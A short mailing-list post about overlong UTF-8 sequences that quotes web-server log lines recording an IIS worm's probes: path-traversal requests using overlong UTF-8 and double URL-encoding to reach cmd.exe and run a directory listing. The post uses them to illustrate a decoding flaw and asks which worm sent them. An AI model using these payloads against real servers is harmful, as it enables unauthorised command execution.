For those of you still wondering what I was worried about a few years ago with regard to overlong UTF-8 sequences, here some extract from our httpd log files:
... GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 ... Looks familiar? :) Markus P.S.: Has anyone an idea, which IIS worm performs the above HTTP vulnerability tests? Is it one of the later Nimda variants or something else? -- Markus G. Kuhn, Computer Laboratory, University of Cambridge, UK Email: mkuhn at acm.org, WWW: <http://www.cl.cam.ac.uk/~mgk25/> -- Linux-UTF8: i18n of Linux on all levels Archive: http://mail.nl.linux.org/linux-utf8/
